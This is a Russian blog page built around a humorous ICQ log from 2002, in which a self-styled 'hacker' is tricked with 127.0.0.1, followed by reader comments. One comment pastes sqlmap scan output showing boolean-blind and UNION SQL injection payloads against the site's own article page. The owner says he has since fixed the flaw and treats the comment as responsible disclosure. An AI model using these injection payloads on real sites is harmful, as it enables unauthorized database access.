Логотип StingRay

Социальные сети
FacebookInstagramRSSTwitterYouTubeВ контактеОдноклассники
FacebookInstagramRSSTwitterYouTubeВ контактеОдноклассники
Силуэт человека

Диалог с хакером

Приводимый ниже диалог по ICQ состоялся при участии одного моего друга, который любезно и предоставил мне историю диалога для публикации. Диалог публикуется впервые и практически без изменений (удалены только номер, псевдоним и некоторые высказывания «хакера»)…

ICQ History Log for: [ICQ UIN] [Nickname]
Started on Thu Jan 03 22:23:04 2002

Stranger   03.01.2002 20:28   ты кто?
Stranger   03.01.2002 20:29   ?
[Nickname]   03.01.2002 20:30   Я-человек!!!
Stranger   03.01.2002 20:30   Обычный?
[Nickname]   03.01.2002 20:31   Нет,я хакер!!!К стати какой у тебя ip???
Stranger   03.01.2002 20:31   Видимо я похож на дурака… =(
Stranger   03.01.2002 20:31   А кто такой хакер?
Stranger   03.01.2002 20:31   Кого так называют?
[Nickname]   03.01.2002 20:32   Хакер зто такой человек…короче долго обяснять.
Stranger   03.01.2002 20:33   Значит я тоже хакер! Я такой человек! Или нет? Что такое ip?
[Nickname]   03.01.2002 20:37   Ты короче залесь в настройки сойдинения и посмотри там!
Stranger   03.01.2002 20:37   Не понял.. Какие-то каракули…
[Nickname]   03.01.2002 20:38   Ну забей!
Stranger   03.01.2002 20:38   Нафига ты меня нашёл?
[Nickname]   03.01.2002 20:39   Так просто,хотел узнать ip…
Stranger   03.01.2002 20:39   А что это?
[Nickname]   03.01.2002 20:40   Я тебе говорю забей,так просто,адрес
Stranger   03.01.2002 20:40   Мой адрес???
[Nickname]   03.01.2002 20:40   Да!
Stranger   03.01.2002 20:41   Который на письме пишут что ли? Или электронный?
[Nickname]   03.01.2002 20:42   Нет ip!
Stranger   03.01.2002 20:42   Это третий какой-то?
Stranger   03.01.2002 20:45   как его узнать?
[Nickname]   03.01.2002 20:50   Ты где??
Stranger   03.01.2002 20:50   То есть?
[Nickname]   03.01.2002 20:51   Да нет я просто отходил
Stranger   03.01.2002 20:52   Ну, что дальше?
[Nickname]   03.01.2002 20:53   Ничё
Stranger   03.01.2002 20:53   127.0.0.1 пробовал?
[Nickname]   03.01.2002 20:54   Нет!
Stranger   03.01.2002 20:54   Мне сказали, что это мой.
Stranger   03.01.2002 20:54   Ip
Stranger   03.01.2002 20:54   ip
[Nickname]   03.01.2002 20:55   Сейчас попробую!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Stranger   03.01.2002 20:55   Опять каракули…
[Nickname]   03.01.2002 20:55   А какой у тебя порт???
Stranger   03.01.2002 20:55   Мне говорят, спроси какой нужен…
[Nickname]   03.01.2002 20:56   Четырёх значный
Stranger   03.01.2002 20:56   Блин, сейчас узнаю… А потом что будет?
[Nickname]   03.01.2002 20:57   Будет всё отлично!
Stranger   03.01.2002 20:58   Мне сказали, что любой можно. Это что значит?
[Nickname]   03.01.2002 20:58   Ладно жди,щас попробуем….! Получилось!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Stranger   03.01.2002 20:59   Что?
[Nickname]   03.01.2002 20:59   Я в твоём компе!!!
Stranger   03.01.2002 21:01   А что ты можешь сделать теперь?
[Nickname]   03.01.2002 21:01   Я узнаю все твои пароли
Stranger   03.01.2002 21:01   Нафига они тебе. Они у меня запаролены. Как мне тебя увидеть?
[Nickname]   03.01.2002 21:03   Никак!
Stranger   03.01.2002 21:04   Ну, чё нить сделай хоть! А то ты гонишь просто и всё
[Nickname]   03.01.2002 21:06   Пошёл на [цензура] ламер!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Stranger   03.01.2002 21:07   Винт форматни. =))) А я над тобой поржу. =)
[Nickname]   03.01.2002 21:08   НУ на
Stranger   03.01.2002 21:09   Ты это делать-то умеешь?
Stranger   03.01.2002 21:22   Как оно? Идёт?

Авторский комментарий: «Далее связь прервалась. Видимо, начинающий хакер действительно умел форматировать винчестеры…»

P. S. Друг мой «совершенно случайно» на тот момент обладал степенью бакалавра техники и технологии по направлению «Информатика и вычислительная техника»…

29.08.2007 09:35:48 Басаргин Александр (IP) Цитата #1
и в момент диалога, на сколько мне известно, отлаживал довольно сложную поисковую интернет-систему
04.08.2009 14:46:24 mischael1 (IP) Цитата #2
старый добрый анегдод:
чат.
***оно приходит в чат***
оно: дайте мне айпишник какого-нибудь лоха!
чатник: 127,0,0,1
***оно вышел из чата***
07.11.2011 11:30:32 root1488 (IP) Цитата #3
Несколько самоуверенно для владельца подобного сайта.
GET https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=it
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

GET https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=travel

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=cars

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=language

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

GET https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=religion

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

GET https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=physiology

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

GET https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=politics

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=philosophy

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

GET https://stanislaw.ru:80/eng/research/articles-reports-etc.asp?category=it
do you want to test this url? [Y/n/q]
> Y
[22:46:18] [INFO] testing url https://stanislaw.ru:80/eng/research/articles-reports-etc.asp?category=it

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 7825=7825 AND 'VKVh'='VKVh
Type: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: category=-2281' UNION ALL SELECT NULL, NULL, CONCAT(0x3a7277793a,0x516751534170536a6846,0x3a6371793a), NULL-- AND 'uOJz'='uOJz

[07:10:47] [INFO] testing url https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=psychology&order=title#table

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

https://stanislaw.ru:80/rus/research/articles-reports-etc.asp?category=physiology&order=title#table

Place: GET
Parameter: category
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: category=it' AND 5304=5304 AND 'MtFf'='MtFf

Дальше сканить задолбался.
14.11.2011 15:34:20 Станислав (IP) Цитата #4
Хотя данный Ваш комментарий, о добрый хакер, не имеет никакого отношения к рассказанной выше забавной истории (off-topic), я всё же не буду его удалять и отвечу на него прямо тут.
Во-первых, большое Вам спасибо за то, что обнаружили SQL-уязвимость в главной странице моего подраздела «Статьи, отчёты и т. п.» (все просканированные выше адреса – это всё одна и та же страница), а особенно за то, что не воспользовались этим, а по-доброму и профессиональному сообщили мне об этом. Сообщаю, что уязвимость я уже устранил, а заодно проверил её возможное наличие в некоторых других местах сайта.
Во-вторых, абсолютной защиты нет и быть не может, это как асимптота, которая бесконечно стремится к оси, но никогда её не пересечёт 😊; но благодаря таким вот добрым хакерам надёжность и защищённость сайта повышается. Ещё раз спасибо.
14.11.2011 17:29:30 SPQR (IP) Цитата #5
абсолютной защиты нет и быть не может
Почему же? То есть ДДОС, допустим, да, неотразим. А вот всё остальное – ошибки проектирования/реализации.
18.11.2011 13:59:19 Станислав (IP) Цитата #6
Даже возможность "неотразимого" DDoS существует из-за ошибок проектирования/реализации - просто не учли такой вид угрозы. Мой тезис был именно о том, что даже безошибочное проектирование/реализация не могут учесть всего, всех угроз настоящего и будущего.
18.11.2011 14:00:39 SPQR (IP) Цитата #7
Либо закрытая контролируемая система, либо бесконечная производительность.
18.11.2011 14:04:17 Станислав (IP) Цитата #8
Либо изощрённый интеллектуальный алгоритм блокирования бот-сетей. 😊
А вообще что-то мы уже сильно отошли от темы – напоминаю, что здесь принимаются комментарии к процитированному юмористическому диалогу с «хакером».
18.11.2011 14:15:11 SPQR (IP) Цитата #9
Оффтоп! Оффтоп!
Не пройдёт. Толщина твоего канала и мощность твоего пограничного оборудования всегда меньше суммы каналов и мощности оборудования потенциальных атакующих (если, конечно, ты не гугл http://www.neowin.net/images/uploaded/googleservers.png).
18.11.2011 14:23:12 Станислав (IP) Цитата #10
iGoogle! 😊
20.06.2013 16:56:22 Fobius (IP) Цитата #11
Ахахахаа!
Друг красавец!
Сказал ему(Хакеру) его-же локальный ip.
Ржал минут пять)))
Все 1 2
Добавьте свой комментарий или войдите, чтобы подписаться/отписаться.
OpenId
Предпросмотр
Улыбка Подмигивание Дразнит Оскал Смех Огорчение Сильное огорчение Шок Сумасшествие Равнодушие Молчание Крутизна Злость Бешенство Смущение Сожаление Влюблённость Ангел Демон Задумчивость Рука-лицо Не могу смотреть Жирный Курсив Подчёркивание Зачёркивание Размер шрифта Гиперссылка Цитата
Загрузка…